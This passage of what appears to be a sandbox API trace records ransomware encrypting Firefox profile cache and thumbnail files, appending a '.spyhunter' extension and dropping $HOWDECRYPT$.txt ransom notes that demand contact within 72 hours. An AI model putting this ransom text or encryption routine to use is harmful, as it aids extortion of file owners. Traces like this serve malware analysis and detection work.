files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.573] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x57ebab*, lpNumberOfBytesWritten=0x57ecd4*=0x127, lpOverlapped=0x0) returned 1 [0153.574] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.574] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecd4*=0x2ac, lpOverlapped=0x0) returned 1 [0153.574] CloseHandle (hObject=0xb0) returned 1 [0153.574] GetProcessHeap () returned 0x2c0000 [0153.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbfbb0 | out: hHeap=0x2c0000) returned 1 [0153.574] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec70 | out: pbBuffer=0x57ec70) returned 1 [0153.574] GetProcessHeap () returned 0x2c0000 [0153.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.574] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec68*=0x30) returned 1 [0153.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0153.575] StrStrW (lpFirst="_CACHE_CLEAN_", lpSrch=".txt") returned 0x0 [0153.575] GetProcessHeap () returned 0x2c0000 [0153.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.575] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec2c*=0x1, lpOverlapped=0x0) returned 1 [0153.576] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.576] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x57ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec2c*=0x1, lpOverlapped=0x0) returned 1 [0153.576] GetProcessHeap () returned 0x2c0000 [0153.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.576] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.576] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec2c, lpOverlapped=0x0 | out: lpBuffer=0x57ec6c*, lpNumberOfBytesWritten=0x57ec2c*=0x4, lpOverlapped=0x0) returned 1 [0153.576] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec2c*=0x30, lpOverlapped=0x0) returned 1 [0153.577] CloseHandle (hObject=0xb0) returned 1 [0153.577] GetProcessHeap () returned 0x2c0000 [0153.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.577] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.spyhunter") returned 113 [0153.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_.spyhunter")) returned 1 [0153.578] GetProcessHeap () returned 0x2c0000 [0153.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.578] GetProcessHeap () returned 0x2c0000 [0153.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.578] GetProcessHeap () returned 0x2c0000 [0153.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b870 | out: hHeap=0x2c0000) returned 1 [0153.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.579] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.579] WriteFile (in: hFile=0xb0, lpBuffer=0x57eba3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x57eba3*, lpNumberOfBytesWritten=0x57eccc*=0x127, lpOverlapped=0x0) returned 1 [0153.580] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.580] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eccc*=0x2ac, lpOverlapped=0x0) returned 1 [0153.580] CloseHandle (hObject=0xb0) returned 1 [0153.580] GetProcessHeap () returned 0x2c0000 [0153.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2df8 | out: hHeap=0x2c0000) returned 1 [0153.580] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec68 | out: pbBuffer=0x57ec68) returned 1 [0153.580] GetProcessHeap () returned 0x2c0000 [0153.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.581] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec60*=0x30) returned 1 [0153.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0153.583] StrStrW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".txt") returned 0x0 [0153.583] GetProcessHeap () returned 0x2c0000 [0153.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.583] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec24*=0x2800, lpOverlapped=0x0) returned 1 [0153.627] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.627] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec24*=0x2800, lpOverlapped=0x0) returned 1 [0153.627] GetProcessHeap () returned 0x2c0000 [0153.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.627] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.628] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x57ec64*, lpNumberOfBytesWritten=0x57ec24*=0x4, lpOverlapped=0x0) returned 1 [0153.732] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec24*=0x30, lpOverlapped=0x0) returned 1 [0153.733] CloseHandle (hObject=0xb0) returned 1 [0153.733] GetProcessHeap () returned 0x2c0000 [0153.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.733] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.spyhunter") returned 147 [0153.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.spyhunter")) returned 1 [0153.734] GetProcessHeap () returned 0x2c0000 [0153.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.734] GetProcessHeap () returned 0x2c0000 [0153.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.734] GetProcessHeap () returned 0x2c0000 [0153.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc98d8 | out: hHeap=0x2c0000) returned 1 [0153.734] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec68 | out: pbBuffer=0x57ec68) returned 1 [0153.734] GetProcessHeap () returned 0x2c0000 [0153.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.735] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec60*=0x30) returned 1 [0153.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0153.736] StrStrW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".txt") returned 0x0 [0153.736] GetProcessHeap () returned 0x2c0000 [0153.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0153.736] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ec24*=0x2800, lpOverlapped=0x0) returned 1 [0153.807] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.807] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ec24*=0x2800, lpOverlapped=0x0) returned 1 [0153.807] GetProcessHeap () returned 0x2c0000 [0153.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0153.807] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.807] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x57ec64*, lpNumberOfBytesWritten=0x57ec24*=0x4, lpOverlapped=0x0) returned 1 [0153.810] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec24*=0x30, lpOverlapped=0x0) returned 1 [0153.810] CloseHandle (hObject=0xb0) returned 1 [0153.810] GetProcessHeap () returned 0x2c0000 [0153.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.810] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.spyhunter") returned 147 [0153.810] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.spyhunter")) returned 1 [0153.812] GetProcessHeap () returned 0x2c0000 [0153.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.812] GetProcessHeap () returned 0x2c0000 [0153.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.812] GetProcessHeap () returned 0x2c0000 [0153.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f262a8 | out: hHeap=0x2c0000) returned 1 [0153.812] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec60 | out: pbBuffer=0x57ec60) returned 1 [0153.812] GetProcessHeap () returned 0x2c0000 [0153.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec58*=0x30) returned 1 [0153.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0153.813] StrStrW (lpFirst="_CACHE_003_", lpSrch=".txt") returned 0x0 [0153.813] GetProcessHeap () returned 0x2c0000 [0153.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0153.813] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ec1c*=0x2800, lpOverlapped=0x0) returned 1 [0153.954] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.954] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ec1c*=0x2800, lpOverlapped=0x0) returned 1 [0153.954] GetProcessHeap () returned 0x2c0000 [0153.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0153.954] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.954] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec1c, lpOverlapped=0x0 | out: lpBuffer=0x57ec5c*, lpNumberOfBytesWritten=0x57ec1c*=0x4, lpOverlapped=0x0) returned 1 [0155.148] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec1c*=0x30, lpOverlapped=0x0) returned 1 [0155.148] CloseHandle (hObject=0xb0) returned 1 [0155.148] GetProcessHeap () returned 0x2c0000 [0155.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.148] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.spyhunter") returned 117 [0155.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_.spyhunter")) returned 1 [0155.149] GetProcessHeap () returned 0x2c0000 [0155.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.149] GetProcessHeap () returned 0x2c0000 [0155.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.149] GetProcessHeap () returned 0x2c0000 [0155.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd9c0 | out: hHeap=0x2c0000) returned 1 [0155.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.150] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.150] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb93*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x57eb93*, lpNumberOfBytesWritten=0x57ecbc*=0x127, lpOverlapped=0x0) returned 1 [0155.151] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.151] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecbc*=0x2ac, lpOverlapped=0x0) returned 1 [0155.151] CloseHandle (hObject=0xb0) returned 1 [0155.151] GetProcessHeap () returned 0x2c0000 [0155.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 